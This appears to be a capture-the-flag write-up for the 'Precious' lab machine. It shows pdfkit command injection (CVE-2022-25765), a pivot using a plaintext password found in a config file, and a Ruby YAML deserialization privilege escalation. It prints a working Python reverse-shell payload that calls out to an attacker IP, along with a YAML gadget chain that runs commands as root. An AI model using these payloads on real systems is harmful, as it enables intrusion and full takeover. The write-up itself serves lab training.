About Precious

  • Precious is an Easy Difficulty Linux machine, that focuses on the Ruby language.
  • It hosts a custom Ruby web application, using an outdated library, namely pdfkit, which is vulnerable to CVE-2022-25765, leading to an initial shell on the target machine.
  • After a pivot using plaintext credentials that are found in a Gem repository config file, the box concludes with an insecure deserialization attack on a custom, outdated, Ruby script.

Scanning

Port scaning with nmap

add this to /etc/hosts.

Foothold

On this page we have Convert Web Page to PDF functionality.

image

after giving url pdf file is downloaded.

using exiftool on pdf we know that it is Generated by pdfkit v0.8.6.

This version is vulnerable to RCE.

Payload:

http://%20`{command}`

we can use this payload to get reverse shell:

http://%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`

references: https://www.revshells.com/

we get shell as user ruby

image

Escalating Privileges

we can see two user in /home directory.

image

user flag is in directory of user henry but it is not accessible.

inside the directory of user ruby there is config file in .bundle in this file we can see password of user henry.

image

we can use this for ssh to henry.

user can run /opt/update_dependencies.rb as root with sudo.

image

this file is not writable. looking at code we see it use YAML.load, which is vulnerable to deserialization attack.

image

we can write in dependencies.yml.

payload:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cat /root/root.txt
         method_id: :resolve

reference: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

now we can run this with sudo and get the root flag.

sudo /usr/bin/ruby /opt/update_dependencies.rb

This will give the root flag.

Happy Hacking